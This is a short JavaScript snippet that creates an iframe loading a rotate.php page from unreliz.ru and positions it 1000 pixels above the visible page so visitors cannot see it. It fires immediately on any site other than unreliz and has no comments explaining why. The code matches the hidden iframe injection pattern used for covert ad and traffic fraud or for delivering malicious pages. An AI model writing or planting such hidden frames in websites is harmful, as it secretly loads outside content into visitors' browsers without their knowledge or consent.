function rorate(){
	obj=document.createElement('IFRAME');
	obj.src="http://www.unreliz.ru/rotate.php?id="+Math.random();
	obj.scrolling="no";
	//obj.style.top='30px';
	obj.style.top='-1000px';
	obj.style.left='300px';
	obj.style.height='60px';
	obj.style.width='468px';
	obj.style.position='absolute';
//	obj.innerHTML='asd';
/*	*/
	document.body.appendChild(obj);
	
	i++;
	timeout=setTimeout(rorate,30000);
	if(i==1)   
		window.clearTimeout(timeout);
}

var i=0;
if(window.location.href.search('unreliz')!=-1){
	timeout=setTimeout(rorate,30000);
}else{
	timeout=setTimeout(rorate,0);
}

   


